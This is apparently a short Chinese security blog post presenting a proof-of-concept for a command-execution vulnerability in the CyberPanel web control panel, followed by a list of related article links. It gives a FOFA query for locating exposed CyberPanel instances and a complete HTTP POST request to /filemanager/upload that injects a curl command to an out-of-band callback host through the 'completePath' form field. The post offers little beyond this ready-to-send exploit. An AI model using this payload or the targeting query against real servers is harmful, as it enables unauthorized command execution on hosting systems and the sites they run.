CyberPanel开源Web控制面板 upload 命令执行漏洞复现及POC

CatalyzeSec2024-11-09 17:51

FOFA

复制代码 
app="CyberPanel"

POC

复制代码 
POST /filemanager/upload HTTP/2
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Content-Type: multipart/form-data; boundary=----NewBoundary123456789
Content-Length: 338

------NewBoundary123456789
Content-Disposition: form-data; name="domainName"

<target>
------NewBoundary123456789
Content-Disposition: form-data; name="completePath"

curl http://DNSlog地址/
------NewBoundary123456789
Content-Disposition: form-data; name="file"; filename="poc.txt"

pwn
------NewBoundary123456789--

漏洞复现

相关推荐
阿乐艾官几秒前
【十一、Linux管理网络安全】
linux·运维·web安全
llxxyy卢8 分钟前
upload-labs(1-13)(配合源码分析)
web安全
jenchoi4132 小时前
【2025-11-12】软件供应链安全日报:最新漏洞预警与投毒预警情报汇总
网络·安全·web安全·网络安全·npm
414a2 小时前
LingJing(灵境)桌面级靶场平台新增:真实入侵复刻,知攻善防实验室-Linux应急响应靶机2,通关挑战
安全·网络安全·lingjing·灵境·lingjing(灵境)
jenchoi4136 小时前
【2025-11-13】软件供应链安全日报:最新漏洞预警与投毒预警情报汇总
网络·安全·web安全·网络安全·npm
z10_146 小时前
动态住宅IP和静态住宅IP哪个更好
网络·tcp/ip·web安全
Fnetlink16 小时前
多云架构时代:解码企业网络安全的全新基因
安全·web安全·架构
ManageEngine卓豪6 小时前
防火墙主要有哪些类型?如何保护网络安全?
网络安全·网络防火墙·防火墙安全
Whoami!8 小时前
⸢ 拾肆-Ⅱ⸥⤳ 实战检验应用实践(下):自动化检验 & 演练复盘
网络安全·信息安全·红蓝对抗·实战演练
饮长安千年月11 小时前
玄机-第八章 内存马分析-java02-shiro
数据库·安全·web安全·网络安全·应急响应
热门推荐
01GitHub 镜像站点02UV安装并设置国内源03BongoCat - 跨平台键盘猫动画工具04安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)05Linux下V2Ray安装配置指南06综合整理:pdf预览显示:你尝试预览的文件可能对你的计算机有害。如果你信任此文件以及其来源,请打开此文件以看其内容,如何解决以正常预览文件07jdk21下载、安装(Windows、Linux、macOS)08Labelme从安装到标注:零基础完整指南09使用国内镜像网站在线下载安装Qt(解决官网慢的问题)——Qt10智能库存管理的需求预测模型:从业务痛点到落地代码的完整实践